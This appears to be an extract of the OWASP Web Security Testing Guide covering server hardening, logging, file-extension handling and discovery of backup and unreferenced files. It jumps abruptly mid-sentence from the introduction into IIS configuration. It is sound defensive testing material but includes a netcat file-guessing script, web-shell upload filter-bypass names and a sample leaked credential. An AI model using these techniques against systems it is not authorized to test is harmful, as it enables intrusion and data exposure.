The Oxford Dictionary of English defines “test” as:</p><p>test (noun): a procedure intended to establish the quality, performance, or reliability of something, especially</p><p>before it is taken into widespread use.</p><p>For the purposes of this document, testing is a process of comparing the state of a system or application against a set of</p><p>criteria. In the security industry, people frequently test against a set of mental criteria that are neither well defined nor</p><p>complete. As a result of this, many outsiders regard security testing as a black art. The aim of this document is to</p><p>change that perception, and to make it easier for people without in-depth security knowledge to make a difference in</p><p>testing.</p><p>Why Perform Testing?</p><p>This document is designed to help organizations understand what comprises a testing program, and to help them</p><p>identify the steps that need to be undertaken to build and operate a testing program on web applications. The guide</p><p>gives a broad view of the elements required to make a comprehensive web application security program. This guide</p><p>can be used as a reference guide and as a methodology to help determine the gap between existing practices and</p><p>industry best practices. This guide allows organizations to compare themselves against industry peers, to understand</p><p>the magnitude of resources required to test and maintain software, or to prepare for an audit. This chapter does not go</p><p>into the technical details of how to test an application, as the intent is to provide a typical security organizational</p><p>framework. 
The technical details about how to test an application, as part of a penetration test or code review, will be</p><p>covered in the remaining parts of this document.</p><p>When to Test?</p><p>Most people today don’t test software until it has already been created and is in the deployment phase of its life cycle</p><p>(i.e., code has been created and instantiated into a working web application). This is generally a very ineffective and</p><p>cost-prohibitive practice. One of the best methods to prevent security bugs from appearing in production applications is</p><p>to improve the Software Development Life Cycle (SDLC) by including security in each of its phases. An SDLC is a</p><p>structure imposed on the development of software artifacts. If an SDLC is not currently being</p><p>whole system, although an attacker could elevate privileges</p><p>once running code as the web server.</p><p>Make sure the server software properly logs both legitimate access and errors.</p><p>Make sure that the server is configured to properly handle overloads and prevent Denial of Service attacks. Ensure</p><p>that the server has been performance-tuned properly.</p><p>Never grant non-administrative identities (with the exception of NT SERVICE\WMSvc ) access to</p><p>applicationHost.config, redirection.config, and administration.config (either Read or Write access). This includes</p><p>Network Service , IIS_IUSRS , IUSR , or any custom identity used by IIS application pools. IIS worker processes</p><p>are not meant to access any of these files directly.</p><p>Never share out applicationHost.config, redirection.config, and administration.config on the network. When using</p><p>Shared Configuration, prefer to export applicationHost.config to another location (see the section titled “Setting</p><p>Permissions for Shared Configuration”).</p><p>Keep in mind that all users can read .NET Framework machine.config and root web.config files by default.
Do</p><p>not store sensitive information in these files if it is intended for administrator eyes only.</p><p>Encrypt sensitive information that should be read by the IIS worker processes only and not by other users on the</p><p>machine.</p><p>Do not grant Write access to the identity that the Web server uses to access the shared applicationHost.config .</p><p>This identity should have only Read access.</p><p>Use a separate identity to publish applicationHost.config to the share. Do not use this identity for configuring</p><p>access to the shared configuration on the Web servers.</p><p>Use a strong password when exporting the encryption keys for use with shared configuration.</p><p>Maintain restricted access to the share containing the shared configuration and encryption keys. If this share is</p><p>compromised, an attacker will be able to read and write any IIS configuration for your Web servers, redirect traffic</p><p>from your Web site to malicious sources, and in some cases gain control of all web servers by loading arbitrary</p><p>code into IIS worker processes.</p><p>Consider protecting this share with firewall rules and IPsec policies to allow only the member web servers to</p><p>connect.</p><p>Logging</p><p>Logging is an important asset of the security of an application architecture, since it can be used to detect flaws in</p><p>applications (users constantly trying to retrieve a file that does not really exist) as well as sustained attacks from rogue</p><p>users. Logs are typically properly generated by web and other server software. It is not common to find applications that</p><p>properly log their actions to a log and, when they do, the main intention of the application logs is to produce debugging</p><p>output that could be used by the programmer to analyze a particular error.</p><p>In both cases (server and application logs) several issues should be tested and analyzed based on the log contents:</p><p>1.
Do the logs contain sensitive information?</p><p>2. Are the logs stored in a dedicated server?</p><p>3. Can log usage generate a Denial of Service condition?</p><p>4. How are they rotated? Are logs kept for a sufficient time?</p><p>5. How are logs reviewed? Can administrators use these reviews to detect targeted attacks?</p><p>6. How are log backups preserved?</p><p>7. Is the data being logged validated (min/max length, characters, etc.) prior to being logged?</p><p>Sensitive Information in Logs</p><p>Some applications might, for example, use GET requests to forward form data which will be seen in the server logs.</p><p>This means that server logs might contain sensitive information (such as usernames and passwords, or bank account</p><p>details). This sensitive information can be misused by an attacker if they obtain the logs, for example, through</p><p>administrative interfaces or known web server vulnerabilities or misconfiguration (like the well-known server-status</p><p>misconfiguration in Apache-based HTTP servers).</p><p>Event logs will often contain data that is useful to an attacker (information leakage) or can be used directly in exploits:</p><p>Debug information</p><p>Stack traces</p><p>Usernames</p><p>System component names</p><p>Internal IP addresses</p><p>Less sensitive personal data (e.g. email addresses, postal addresses and telephone numbers associated with</p><p>named individuals)</p><p>Business data</p><p>Also, in some jurisdictions, storing some sensitive information in log files, such as personal data, might oblige the</p><p>enterprise to apply the data protection laws that they would apply to their back-end databases to log files too.
And</p><p>failure to do so, even unknowingly, might carry penalties under the data protection laws that apply.</p><p>A wider list of sensitive information is:</p><p>Application source code</p><p>Session identification values</p><p>Access tokens</p><p>Sensitive personal data and some forms of personally identifiable information (PII)</p><p>Authentication passwords</p><p>Database connection strings</p><p>Encryption keys</p><p>Bank account or payment card holder data</p><p>Data of a higher security classification than the logging system is allowed to store</p><p>Commercially-sensitive information</p><p>Information it is illegal to collect in the relevant jurisdiction</p><p>Information a user has opted out of collection, or not consented to, e.g. use of Do Not Track, or where consent to</p><p>collect has expired</p><p>Log Location</p><p>Typically servers will generate local logs of their actions and errors, consuming the disk of the system the server is</p><p>running on. However, if the server is compromised its logs can be wiped out by the intruder to clean up all the traces of</p><p>their attack and methods. If this were to happen the system administrator would have no knowledge of how the attack</p><p>occurred or where the attack source was located. Actually, most attacker tool kits include a “log zapper” that is capable</p><p>of cleaning up any logs that hold given information (like the IP address of the attacker), and these are routinely used in</p><p>attackers’ system-level root kits.</p><p>Consequently, it is wiser to keep logs in a separate location and not in the web server itself.
This also makes it easier to</p><p>aggregate logs from different sources that refer to the same application (such as those of a web server farm) and it also</p><p>makes it easier to do log analysis (which can be CPU intensive) without affecting the server itself.</p><p>Log Storage</p><p>Logs can introduce a Denial of Service condition if they are not properly stored. Any attacker with sufficient resources</p><p>would be able to produce a sufficient number of requests to fill up the space allocated to log files, if they are not</p><p>specifically prevented from doing so. However, if the server is not properly configured, the log files will be stored in the</p><p>same disk partition as the one used for the operating system software or the application itself. This means that if the</p><p>disk were to be filled up the operating system or the application might fail because it is unable to write on disk.</p><p>Typically in UNIX systems logs will be located in /var (although some server installations might reside in /opt or</p><p>/usr/local) and it is important to make sure that the directories in which logs are stored are in a separate partition. In</p><p>some cases, and in order to prevent the system logs from being affected, the log directory of the server software itself</p><p>(such as /var/log/apache in the Apache web server) should be stored in a dedicated partition.</p><p>This is not to say that logs should be allowed to grow to fill up the file system they reside in. Growth of server logs</p><p>should be monitored in order to detect this condition since it may be indicative of an attack.</p><p>Testing this condition is as easy, and as dangerous in production environments, as firing off a sufficient and sustained</p><p>number of requests to see if these requests are logged and if there is a possibility to fill up the log partition through</p><p>these requests.
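The log-exhaustion test just described can be sketched with some back-of-the-envelope arithmetic. The partition size, the bytes-logged-per-request figure, and the target URL below are illustrative assumptions, not values from this guide:

```python
# Hypothetical sketch of estimating the log-filling test. The sizes and the
# target URL are assumptions for illustration only -- never run a flooding
# loop like the commented one against a production system.

def padded_url(base: str, size: int) -> str:
    """Build a GET URL with a large QUERY_STRING, so that servers which log
    query parameters write roughly `size` extra bytes per request."""
    return base + "?pad=" + "A" * size

def requests_to_fill(free_bytes: int, bytes_per_request: int) -> int:
    """Approximate number of requests needed to exhaust the log partition."""
    return -(-free_bytes // bytes_per_request)  # ceiling division

# Example: a 1 GiB log partition and ~4 KiB logged per padded request.
print(requests_to_fill(1 * 1024**3, 4096))  # 262144 -- feasible for one attacker

# The actual test loop would look like (deliberately left commented out):
#   import urllib.request
#   for _ in range(requests_to_fill(1 * 1024**3, 4096)):
#       urllib.request.urlopen(padded_url("http://target.example/", 4000))
```

Even a modest estimate like this shows why log partitions must be separate from the OS and application partitions: a single attacker can plausibly generate hundreds of thousands of requests.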
In some environments where QUERY_STRING parameters are also logged regardless of whether they</p><p>are produced through GET or POST requests, big queries can be simulated that will fill up the logs faster, since an ordinary</p><p>request typically causes only a small amount of data to be logged, such as date and time, source IP</p><p>address, URI request, and server result.</p><p>Log Rotation</p><p>Most servers (but few custom applications) will rotate logs in order to prevent them from filling up the file system they</p><p>reside on. The assumption when rotating logs is that the information in them is only necessary for a limited amount of</p><p>time.</p><p>This feature should be tested in order to ensure that:</p><p>Logs are kept for the time defined in the security policy, not more and not less.</p><p>Logs are compressed once rotated (this is a convenience, since it will mean that more logs will be stored for the</p><p>same available disk space).</p><p>File system permissions of rotated log files are the same as (or stricter than) those of the log files themselves. For example,</p><p>web servers will need to write to the logs they use but they don’t actually need to write to rotated logs, which means</p><p>that the permissions of the files can be changed upon rotation to prevent the web server process from modifying</p><p>these.</p><p>Some servers might rotate logs when they reach a given size. If this happens, it must be ensured that an attacker</p><p>cannot force logs to rotate in order to hide their tracks.</p><p>Log Access Control</p><p>Event log information should never be visible to end users. Even web administrators should not be able to see such</p><p>logs since it breaks separation of duty controls.
Ensure that any access control schema that is used to protect access to</p><p>raw logs and any applications providing capabilities to view or search the logs is not linked with access control</p><p>schemas for other application user roles. Neither should any log data be viewable by unauthenticated users.</p><p>Log Review</p><p>Review of logs can be used for more than extraction of usage statistics of files in the web servers (which is typically</p><p>what most log-based applications focus on); it can also be used to determine whether attacks are taking place against the web server.</p><p>In order to analyze web server attacks the error log files of the server need to be analyzed. Review should concentrate</p><p>on:</p><p>40x (not found) error messages. A large number of these from the same source might be indicative of a CGI</p><p>scanner tool being used against the web server</p><p>50x (server error) messages. These can be an indication of an attacker abusing parts of the application which fail</p><p>unexpectedly. For example, the first phases of a SQL injection attack will produce these error messages when the</p><p>SQL query is not properly constructed and its execution fails on the back end database.</p><p>Log statistics or analysis should not be generated, nor stored, in the same server that produces the logs.
Otherwise, an</p><p>attacker might, through a web server vulnerability or improper configuration, gain access to them and retrieve similar</p><p>information to that disclosed by the log files themselves.</p><p>References</p><p>Apache</p><p>Apache Security, by Ivan Ristic, O’Reilly, March 2005.</p><p>Apache Security Secrets: Revealed (Again), Mark Cox, November 2003</p><p>Apache Security Secrets: Revealed, ApacheCon 2002, Las Vegas, Mark J Cox, October 2002</p><p>Performance Tuning</p><p>Lotus Domino</p><p>Lotus Security Handbook, William Tworek et al., April 2004, available in the IBM Redbooks collection</p><p>Lotus Domino Security, an X-Force white paper, Internet Security Systems, December 2002</p><p>Hackproofing Lotus Domino Web Server, David Litchfield, October 2001</p><p>Microsoft IIS</p><p>Security Best Practices for IIS 8</p><p>CIS Microsoft IIS Benchmarks</p><p>Securing Your Web Server (Patterns and Practices), Microsoft Corporation, January 2004</p><p>IIS Security and Programming Countermeasures, by Jason Coombs</p><p>From Blueprint to Fortress: A Guide to Securing IIS 5.0, by John Davis, Microsoft Corporation, June 2001</p><p>Secure Internet Information Services 5 Checklist, by Michael Howard, Microsoft Corporation, June 2000</p><p>Red Hat’s (formerly Netscape’s) iPlanet</p><p>Guide to the Secure Configuration and Administration of iPlanet Web Server, Enterprise Edition 4.1, by James</p><p>M Hayes, The Network Applications Team of the Systems and Network Attack Center (SNAC), NSA, January</p><p>2001</p><p>WebSphere</p><p>IBM WebSphere V5.0 Security, WebSphere Handbook Series, by Peter Kovari et al., IBM, December 2002.</p><p>IBM WebSphere V4.0 Advanced Edition Security, by Peter Kovari et al., IBM, March
2002.</p><p>https://awe.com/mark/talks/apachecon2003us.html</p><p>https://awe.com/mark/talks/apachecon2002us.html</p><p>https://httpd.apache.org/docs/current/misc/perf-tuning.html</p><p>https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/jj635855(v=ws.11)</p><p>https://www.cisecurity.org/benchmark/microsoft_iis/</p><p>General</p><p>Logging Cheat Sheet, OWASP</p><p>SP 800-92 Guide to Computer Security Log Management, NIST</p><p>PCI DSS v3.1 Requirement 10 and PA-DSS v2.0 Requirement 4, PCI Security Standards Council</p><p>Generic:</p><p>CERT Security Improvement Modules: Securing Public Web Servers</p><p>How To: Use IISLockdown.exe</p><p>https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html</p><p>https://csrc.nist.gov/publications/detail/sp/800-92/final</p><p>https://www.pcisecuritystandards.org/document_library</p><p>https://resources.sei.cmu.edu/asset_files/SecurityImprovementModule/2000_006_001_13637.pdf</p><p>https://support.microsoft.com/en-us/help/325864/how-to-install-and-use-the-iis-lockdown-wizard</p><p>Test File Extensions Handling for Sensitive Information</p><p>ID</p><p>WSTG-CONF-03</p><p>Summary</p><p>File extensions are commonly used in web servers to easily determine which technologies, languages and plugins</p><p>must be used to fulfill the web request. While this behavior is consistent with RFCs and Web Standards, using standard</p><p>file extensions provides the penetration tester useful information about the underlying technologies used in a web</p><p>appliance and greatly simplifies the task of determining the attack scenario to be used on particular technologies.
In</p><p>addition, misconfiguration of web servers could easily reveal confidential information about access credentials.</p><p>Extension checking is often used to validate files to be uploaded, which can lead to unexpected results because the</p><p>content is not what is expected, or because of unexpected OS file name handling.</p><p>Determining how web servers handle requests corresponding to files having different extensions may help in</p><p>understanding web server behavior depending on the kind of files that are accessed. For example, it can help to</p><p>understand which file extensions are returned as text/plain versus those that cause execution on the server side. The</p><p>latter are indicative of technologies, languages or plugins that are used by web servers or application servers, and may</p><p>provide additional insight on how the web application is engineered. For example, a “.pl” extension is usually</p><p>associated with server-side Perl support. However, the file extension alone may be deceptive and not fully conclusive.</p><p>For example, Perl server-side resources might be renamed to conceal the fact that they are indeed Perl related. See</p><p>the next section on “web server components” for more on identifying server side technologies and components.</p><p>How to Test</p><p>Forced Browsing</p><p>Submit requests with different file extensions and verify how they are handled. The verification should be on a per web</p><p>directory basis. Verify directories that allow script execution. Web server directories can be identified by scanning tools</p><p>which look for the presence of well-known directories. In addition, mirroring the web site structure allows the tester to</p><p>reconstruct the tree of web directories served by the application.</p><p>If the web application architecture is load-balanced, it is important to assess all of the web servers.
This may or may not</p><p>be easy, depending on the configuration of the balancing infrastructure. In an infrastructure with redundant components</p><p>there may be slight variations in the configuration of individual web or application servers. This may happen if the web</p><p>architecture employs heterogeneous technologies (think of a set of IIS and Apache web servers in a load-balancing</p><p>configuration, which may introduce slight asymmetric behavior between them, and possibly different vulnerabilities).</p><p>Example</p><p>The tester has identified the existence of a file named connection.inc . Trying to access it directly gives back its</p><p>contents, which are:</p><p><?</p><p>mysql_connect("127.0.0.1", "root", "password")</p><p>or die("Could not connect");</p><p>?></p><p>The tester determines the existence of a MySQL DBMS back end, and the (weak) credentials used by the web</p><p>application to access it.</p><p>The following file extensions should never be returned by a web server, since they are related to files which may</p><p>contain sensitive information or to files for which there is no reason to be served.</p><p>.asa</p><p>.inc</p><p>.config</p><p>The following file extensions are related to files which, when accessed, are either displayed or downloaded by the</p><p>browser.
Therefore, files with these extensions must be checked to verify that they are indeed supposed to be served</p><p>(and are not leftovers), and that they do not contain sensitive information.</p><p>.zip, .tar, .gz, .tgz, .rar, …: (Compressed) archive files</p><p>.java: No reason to provide access to Java source files</p><p>.txt: Text files</p><p>.pdf: PDF documents</p><p>.doc, .rtf, .xls, .ppt, …: Office documents</p><p>.bak, .old and other extensions indicative of backup files (for example: ~ for Emacs backup files)</p><p>The list given above details only a few examples, since file extensions are too many to be comprehensively treated</p><p>here. Refer to https://filext.com for a more thorough database of extensions.</p><p>To identify files having a given extension, a mix of techniques can be employed. These techniques include</p><p>vulnerability scanners, spidering and mirroring tools, manual inspection of the application (this overcomes limitations in</p><p>automatic spidering), and querying search engines (see Testing: Spidering and googling).
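As a minimal sketch of probing a known resource name against a list of extensions, the following may help; the host name, the extension list, and the disclosure heuristic are assumptions for the example, not prescriptions from this guide:

```python
# Illustrative sketch: generate probe URLs for interesting extensions and
# classify responses. The host name and heuristic below are assumptions.
from urllib.parse import urljoin

EXTENSIONS = [".inc", ".asa", ".config", ".bak", ".old", ".txt", ".zip"]

def candidate_urls(base: str, resource: str) -> list:
    """Generate one probe URL per interesting extension."""
    return [urljoin(base, resource + ext) for ext in EXTENSIONS]

def looks_disclosed(status: int, content_type: str) -> bool:
    """A 200 answer served as text/plain for a resource that should execute
    server-side suggests source disclosure rather than execution."""
    return status == 200 and content_type.startswith("text/plain")

urls = candidate_urls("http://target.example/", "connection")
print(urls[0])  # http://target.example/connection.inc
```

Fetching each URL (for example with urllib.request) and feeding the status code and Content-Type header into looks_disclosed() is left to the tester, since the transport details depend on the environment.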
See also Testing for Old, Backup</p><p>and Unreferenced Files which deals with the security issues related to “forgotten” files.</p><p>File Upload</p><p>Windows 8.3 legacy file handling can sometimes be used to defeat file upload filters</p><p>Usage Examples:</p><p>file.phtml gets processed as PHP code</p><p>FILE~1.PHT is served, but not processed by the PHP ISAPI handler</p><p>shell.phPWND can be uploaded</p><p>SHELL~1.PHP will be expanded and returned by the OS shell, then processed by the PHP ISAPI handler</p><p>Gray-Box Testing</p><p>Performing white-box testing against file extensions handling amounts to checking the configurations of web servers or</p><p>application servers taking part in the web application architecture, and verifying how they are instructed to serve</p><p>different file extensions.</p><p>If the web application relies on a load-balanced, heterogeneous infrastructure, determine whether this may introduce</p><p>different behavior.</p><p>Tools</p><p>Vulnerability scanners, such as Nessus and Nikto check for the existence of well-known web directories. They may</p><p>allow the tester to download the web site structure, which is helpful when trying to determine the configuration of web</p><p>directories and how individual file extensions are served. 
Other tools that can be used for this purpose include:</p><p>wget</p><p>https://filext.com/</p><p>https://www.gnu.org/software/wget</p><p>curl</p><p>google for “web mirroring tools”.</p><p>https://curl.haxx.se/</p><p>Review Old Backup and Unreferenced Files for Sensitive</p><p>Information</p><p>ID</p><p>WSTG-CONF-04</p><p>Summary</p><p>While most of the files within a web server are directly handled by the server itself, it isn’t uncommon to find</p><p>unreferenced or forgotten files that can be used to obtain important information about the infrastructure or the</p><p>credentials.</p><p>Most common scenarios include the presence of renamed old versions of modified files, inclusion files that are loaded</p><p>into the language of choice and can be downloaded as source, or even automatic or manual backups in the form of</p><p>compressed archives. Backup files can also be generated automatically by the underlying file system the application is</p><p>hosted on, a feature usually referred to as “snapshots”.</p><p>All these files may grant the tester access to inner workings, back doors, administrative interfaces, or even credentials</p><p>to connect to the administrative interface or the database server.</p><p>An important source of vulnerability lies in files which have nothing to do with the application, but are created as a</p><p>consequence of editing application files, or after creating on-the-fly backup copies, or by leaving in the web tree old</p><p>files or unreferenced files. Performing in-place editing or other administrative actions on production web servers may</p><p>inadvertently leave backup copies, either generated automatically by the editor while editing files, or by the</p><p>administrator who is zipping a set of files to create a backup.</p><p>It is easy to forget such files and this may pose a serious security threat to the application.
That happens because</p><p>backup copies may be generated with file extensions differing from those of the original files. A .tar , .zip or .gz</p><p>archive that we generate (and forget…) obviously has a different extension, and the same happens with automatic</p><p>copies created by many editors (for example, emacs generates a backup copy named file~ when editing file ).</p><p>Making a copy by hand may produce the same effect (think of copying file to file.old ). The underlying file system</p><p>the application is on could be making snapshots of your application at different points in time without your knowledge,</p><p>which may also be accessible via the web, posing a similar, backup-file style threat to your application.</p><p>As a result, these activities generate files that are not needed by the application and may be handled differently than</p><p>the original file by the web server. For example, if we make a copy of login.asp named login.asp.old , we are</p><p>allowing users to download the source code of login.asp . This is because login.asp.old will typically be served as</p><p>text/plain, rather than being executed, because of its extension. In other words, accessing login.asp causes the</p><p>execution of the server-side code of login.asp , while accessing login.asp.old causes the content of</p><p>login.asp.old (which is, again, server-side code) to be plainly returned to the user and displayed in the browser. This</p><p>may pose security risks, since sensitive information may be revealed.</p><p>Generally, exposing server side code is a bad idea. Not only are you unnecessarily exposing business logic, but you</p><p>may be unknowingly revealing application-related information which may help an attacker (path names, data</p><p>structures, etc.).
Not to mention the fact that there are too many scripts with embedded usernames and passwords in clear</p><p>text (which is a careless and very dangerous practice).</p><p>Unreferenced files may also result from design or configuration choices that allow diverse kinds of</p><p>application-related files, such as data files, configuration files, and log files, to be stored in file system directories that can be</p><p>accessed by the web server. These files normally have no reason to be in a file system space that could be accessed</p><p>via the web, since they should be accessed only at the application level, by the application itself (and not by the casual</p><p>user browsing around).</p><p>Threats</p><p>Old, backup and unreferenced files present various threats to the security of a web application:</p><p>Unreferenced files may disclose sensitive information that can facilitate a focused attack against the application; for</p><p>example include files containing database credentials, configuration files containing references to other hidden</p><p>content, absolute file paths, etc.</p><p>Unreferenced pages may contain powerful functionality that can be used to attack the application; for example an</p><p>administration page that is not linked from published content but can be accessed by any user who knows where</p><p>to find it.</p><p>Old and backup files may contain vulnerabilities that have been fixed in more recent versions; for example</p><p>viewdoc.old.jsp may contain a directory traversal vulnerability that has been fixed in viewdoc.jsp but can still</p><p>be exploited by anyone who finds the old version.</p><p>Backup files may disclose the source code for pages designed to execute on the server; for example requesting</p><p>viewdoc.bak may return the source code for viewdoc.jsp , which can be reviewed for vulnerabilities that may be</p><p>difficult to find by making blind requests to the executable page.
While this threat obviously applies to scripted</p><p>languages, such as Perl, PHP, ASP, shell scripts, JSP, etc., it is not limited to them, as shown in the example</p><p>provided in the next bullet.</p><p>Backup archives may contain copies of all files within (or even outside) the webroot. This allows an attacker to</p><p>quickly enumerate the entire application, including unreferenced pages, source code, include files, etc. For</p><p>example, if you forget a file named myservlets.jar.old containing (a backup copy of) your servlet</p><p>implementation classes, you are exposing a lot of sensitive information which is susceptible to decompilation and</p><p>reverse engineering.</p><p>In some cases copying or editing a file does not modify the file extension, but modifies the file name. This happens</p><p>for example in Windows environments, where file copying operations generate file names prefixed with “Copy of ”</p><p>or localized versions of this string. Since the file extension is left unchanged, this is not a case where an</p><p>executable file is returned as plain text by the web server, and therefore not a case of source code disclosure.</p><p>However, these files too are dangerous because there is a chance that they include obsolete and incorrect logic</p><p>that, when invoked, could trigger application errors, which might yield valuable information to an attacker, if</p><p>diagnostic message display is enabled.</p><p>Log files may contain sensitive information about the activities of application users, for example sensitive data</p><p>passed in URL parameters, session IDs, URLs visited (which may disclose additional unreferenced content), etc.</p><p>Other log files (e.g. ftp logs) may contain sensitive information about the maintenance of the application by system</p><p>administrators.</p><p>File system snapshots may contain copies of the code that contain vulnerabilities that have been fixed in more</p><p>recent versions.
For example, /.snapshot/monthly.1/view.php may contain a directory traversal vulnerability that has been fixed in /view.php but can still be exploited by anyone who finds the old version.

How to Test

Black-Box Testing

Testing for unreferenced files uses both automated and manual techniques, and typically involves a combination of the following:

Inference from the Naming Scheme Used for Published Content

Enumerate all of the application's pages and functionality. This can be done manually using a browser, or using an application spidering tool. Most applications use a recognizable naming scheme, and organize resources into pages and directories using words that describe their function. From the naming scheme used for published content, it is often possible to infer the name and location of unreferenced pages. For example, if a page viewuser.asp is found, then look also for edituser.asp, adduser.asp and deleteuser.asp. If a directory /app/user is found, then look also for /app/admin and /app/manager.

Other Clues in Published Content

Many web applications leave clues in published content that can lead to the discovery of hidden pages and functionality. These clues often appear in the source code of HTML and JavaScript files. The source code for all published content should be manually reviewed to identify clues about other pages and functionality. For example:

Programmers' comments and commented-out sections of source code may refer to hidden content:

<!-- <A HREF="uploadfile.jsp">Upload a document to the server</A> -->
<!-- Link removed while bugs in uploadfile.jsp are fixed -->

JavaScript may contain page links that are only rendered within the user's GUI under certain circumstances:

var adminUser=false;
if (adminUser) menu.add (new menuItem ("Maintain users", "/admin/useradmin.jsp"));

HTML pages may contain FORMs that have been hidden by disabling the SUBMIT element:

<FORM action="forgotPassword.jsp" method="post">
  <INPUT type="hidden" name="userID" value="123">
  <!-- <INPUT type="submit" value="Forgot Password"> -->
</FORM>

Another source of clues about unreferenced directories is the /robots.txt file used to provide instructions to web robots:

User-agent: *
Disallow: /Admin
Disallow: /uploads
Disallow: /backup
Disallow: /~jbloggs
Disallow: /include

Blind Guessing

In its simplest form, this involves running a list of common file names through a request engine in an attempt to guess files and directories that exist on the server. The following netcat wrapper script will read a wordlist from stdin and perform a basic guessing attack:

#!/bin/bash
server=example.org
port=80
while read url
do
  echo -ne "$url\t"
  echo -e "GET /$url HTTP/1.0\nHost: $server\n" | netcat $server $port | head -1
done | tee outputfile

Depending upon the server, GET may be replaced with HEAD for faster results. The output file specified can be grepped for "interesting" response codes. The response code 200 (OK) usually indicates that a valid resource has been found (provided the server does not deliver a custom "not found" page using the 200 code).
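The same guessing loop can be sketched with Python's standard library. The host name here is a placeholder, and `probe` should only be pointed at systems you are authorized to test; `parse_status` mirrors the `head -1` step on raw netcat output:

```python
import http.client

def probe(host, path, port=80, method="HEAD"):
    """Request a candidate path and return the HTTP status code."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request(method, "/" + path.lstrip("/"))
        return conn.getresponse().status
    finally:
        conn.close()

def parse_status(status_line):
    """Extract the status code from a raw status line, e.g. "HTTP/1.1 200 OK"."""
    return int(status_line.split()[1])
```

A wordlist can then be walked with something like `for word in words: print(word, probe(server, word))`, recording each status for later review.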
But also look out for 301 (Moved), 302 (Found), 401 (Unauthorized), 403 (Forbidden) and 500 (Internal Server Error), which may also indicate resources or directories that are worthy of further investigation.

The basic guessing attack should be run against the webroot, and also against all directories that have been identified through other enumeration techniques. More advanced and effective guessing attacks can be performed as follows:

- Identify the file extensions in use within known areas of the application (e.g. jsp, aspx, html), and use a basic wordlist appended with each of these extensions (or use a longer list of common extensions if resources permit).
- For each file identified through other enumeration techniques, create a custom wordlist derived from that filename. Get a list of common file extensions (including ~, bak, txt, src, dev, old, inc, orig, copy, tmp, swp, etc.) and use each extension before, after, and instead of the extension of the actual file name.

Note: Windows file copying operations generate file names prefixed with "Copy of " or localized versions of this string, hence they do not change file extensions.
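The wordlist derivation just described (each backup extension used after, before, and instead of the real one, plus the Windows "Copy of " prefix) can be sketched as:

```python
import os

# Common backup/copy suffixes suggested above.
BACKUP_EXTS = ["~", "bak", "txt", "src", "dev", "old", "inc", "orig", "copy", "tmp", "swp"]

def backup_candidates(filename):
    """Derive likely backup names from a known filename."""
    base, ext = os.path.splitext(filename)      # "viewdoc.jsp" -> ("viewdoc", ".jsp")
    names = set()
    for b in BACKUP_EXTS:
        suffix = b if b == "~" else "." + b
        names.add(filename + suffix)            # after:      viewdoc.jsp.bak
        names.add(base + suffix + ext)          # before:     viewdoc.bak.jsp
        names.add(base + suffix)                # instead of: viewdoc.bak
    names.add("Copy of " + filename)            # Windows copy naming
    return sorted(names)
```

Each candidate can then be fed to the request loop shown earlier.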
While "Copy of " files typically do not disclose source code when accessed, they might yield valuable information if they cause errors when invoked.

Information Obtained Through Server Vulnerabilities and Misconfiguration

The most obvious way in which a misconfigured server may disclose unreferenced pages is through directory listing. Request all enumerated directories to identify any which provide a directory listing.

Numerous vulnerabilities have been found in individual web servers which allow an attacker to enumerate unreferenced content, for example:

- Apache ?M=D directory listing vulnerability.
- Various IIS script source disclosure vulnerabilities.
- IIS WebDAV directory listing vulnerabilities.

Use of Publicly Available Information

Pages and functionality in Internet-facing web applications that are not referenced from within the application itself may be referenced from other public domain sources. There are various sources of these references:

- Pages that used to be referenced may still appear in the archives of Internet search engines. For example, 1998results.asp may no longer be linked from a company's website, but may remain on the server and in search engine databases. This old script may contain vulnerabilities that could be used to compromise the entire site. The site: Google search operator may be used to run a query only against the domain of choice, such as in: site:www.example.com. Using search engines in this way has led to a broad array of techniques which you may find useful and that are described in the Google Hacking section of this Guide. Check it to hone your testing skills via Google. Backup files are not likely to be referenced by any other files and therefore may not have been indexed by Google, but if they lie in browsable directories the search engine might know about them.
- In addition, Google and Yahoo keep cached versions of pages found by their robots. Even if 1998results.asp has been removed from the target server, a version of its output may still be stored by these search engines. The cached version may contain references to, or clues about, additional hidden content that still remains on the server.
- Content that is not referenced from within a target application may be linked to by third-party websites. For example, an application which processes online payments on behalf of third-party traders may contain a variety of bespoke functionality which can (normally) only be found by following links within the web sites of its customers.

File Name Filter Bypass

Because blacklist filters are based on regular expressions, one can sometimes take advantage of obscure OS file name expansion features which work in ways the developer didn't expect. The tester can sometimes exploit differences in the ways that file names are parsed by the application, the web server, and the underlying OS and its file name conventions.

Example: Windows 8.3 filename expansion: c:\program files becomes C:\PROGRA~1

- Remove incompatible characters
- Convert spaces to underscores
- Take the first six characters of the basename
- Add ~<digit>, which is used to distinguish files whose names share the same six initial characters (this convention changes after the first three name collisions)
- Truncate the file extension to three characters
- Make all the characters uppercase

Gray-Box Testing

Performing gray-box testing against old and backup files requires examining the files contained in the directories belonging to the set of web directories served by the web server(s) of the web application infrastructure. Theoretically the examination should be performed by hand to be thorough. However, since in most cases copies of files or backup files tend to be created by using the same naming conventions, the search can be easily scripted. For example, editors leave behind backup copies by naming them with a recognizable extension or ending, and humans tend to leave behind files with .old or similar predictable extensions. A good strategy is to periodically schedule a background job that checks for files with extensions likely to identify them as copy or backup files, and to perform manual checks as well on a longer time basis.

Tools

Vulnerability assessment tools tend to include checks to spot web directories having standard names (such as "admin", "test", "backup", etc.), and to report any web directory which allows indexing. If you can't get any directory listing, you should try to check for likely backup extensions.
Check for example:

- Nessus
- Nikto2

Web spider tools:

- wget
- Wget for Windows
- Sam Spade
- Spike proxy (includes a web site crawler function)
- Xenu
- curl

Some of them are also included in standard Linux distributions. Web development tools usually include facilities to identify broken links and unreferenced files.

https://www.tenable.com/products/nessus
https://cirt.net/Nikto2
https://www.gnu.org/software/wget/
http://www.interlog.com/~tcharron/wgetwin.html
https://web.archive.org/web/20090926061558/http://preview.samspade.org/ssw/download.html
https://www.spikeproxy.com/
http://home.snafu.de/tilman/xenulink.html
https://curl.haxx.se/

Remediation

To guarantee an effective protection strategy, testing should be complemented by a security policy which clearly forbids dangerous practices, such as:

- Editing files in-place on the web server or application server file systems. This is a particularly bad habit, since it is likely that the editor will inadvertently generate backup files. It is amazing to see how often this is done, even in large organizations. If you absolutely need to edit files on a production system, do ensure that you don't leave behind anything which is not explicitly intended, and consider that you are doing it at your own risk.
